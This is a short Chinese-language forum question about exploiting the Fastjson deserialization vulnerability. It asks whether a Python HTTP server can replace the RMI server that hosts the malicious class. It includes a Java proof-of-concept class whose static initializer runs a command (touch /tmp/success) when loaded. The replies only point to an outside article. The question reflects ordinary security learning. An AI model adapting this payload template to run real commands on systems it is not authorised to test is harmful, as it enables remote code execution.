fastjson漏洞怎么利用？

网上的教程开启rmi服务，把恶意类放在里面. 有python3 -m http.server代替rmi可以吗？

Fastjson的反序列化漏洞和远程代码执行漏洞的复现方式是一样的吗？

为什么这个类会执行？

// javac TouchFile.java
import java.lang.Runtime;
import java.lang.Process;
 
public class TouchFile {
    static {
        try {
            Runtime rt = Runtime.getRuntime();
            String[] commands = {"touch", "/tmp/success"};
            Process pc = rt.exec(commands);
            pc.waitFor();
        } catch (Exception e) {
            // do nothing
        }
    }
}

http://t.csdn.cn/B7ST5
好兄弟可以借鉴一下我的文章

也可以借鉴下我的文章